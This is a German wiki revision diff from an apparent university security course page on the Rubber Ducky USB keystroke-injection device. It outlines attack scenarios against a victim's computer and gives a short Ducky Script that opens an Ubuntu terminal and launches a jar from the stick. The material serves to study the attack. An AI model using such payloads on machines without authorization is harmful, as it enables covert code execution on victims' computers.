USB: Rubber Ducky: Difference between revisions

From
Jump to navigation Jump to search
(Created page with "== Grundlagen == [..] Rubber Ducky ist ein Microcontroller (AMTEL 32bit) mit SD-Karte der aussieht wie ein USB-Stick und sich verhält wie eine Tastatur. So kann alles mit dem …")
 
Line 32: Line 32:


<code>
<code>
REM open terminal on ubuntu-distros
REM open terminal on ubuntu-distros<br>
DELAY 500<br>

CTRL-ALT t<br>
DELAY 500
DELAY 50<br>

ENTER<br>
CTRL-ALT t
DELAY 5000<br>

STRING java -jar /media/$USER/DUCKYDRIVE/RubberDucky.jar &<br>
DELAY 50
DELAY 50<br>

ENTER
ENTER<br>
DELAY 5000<br>

STRING exit<br>
DELAY 5000
DELAY 50<br>

STRING java -jar /media/$USER/DUCKYDRIVE/RubberDucky.jar &

DELAY 50

ENTER

DELAY 5000

STRING exit

DELAY 50

ENTER
ENTER
</code>
</code>

Revision as of 22:43, 13 October 2017

Grundlagen

[..]

Rubber Ducky ist ein Microcontroller (AMTEL 32bit) mit SD-Karte der aussieht wie ein USB-Stick und sich verhält wie eine Tastatur. So kann alles mit dem Gerät gemacht werden, was mit der Tastatur gemacht werden könnte.

Allg. Ablauf:

1.SD-Karte einstecken

2.Ducky-Script encoden (.jar oder Website toolkit) zu .bin

3.Payload (.bin) auf SD-Karte ablegen

4.USB-Stick in Opfer-Rechner stecken

5.Payload führt sich automatisch aus

Angriffsszenarien

-1.Angriffsszenario: Angreifer kann selbst (zumindest für einen kurzen Zeitraum) auf das Gerät physisch zugreifen und den RubberDucky selbst einstecken.

-2. Angriffsszenario: Angreifer muss Oper dazu bewegen, selbst RubberDucky in den Zielrechner einzustecken.

Bash starten

-1.Problem: Betriebssystem ermitteln

1.Lösungsansatz: Hotkeys

DetourDuck

REM open terminal on ubuntu-distros
DELAY 500
CTRL-ALT t
DELAY 50
ENTER
DELAY 5000
STRING java -jar /media/$USER/DUCKYDRIVE/RubberDucky.jar &
DELAY 50
ENTER
DELAY 5000
STRING exit
DELAY 50
ENTER

Retrieved from "https://sarwiki.informatik.hu-berlin.de/index.php?title=USB:_Rubber_Ducky&oldid=12561"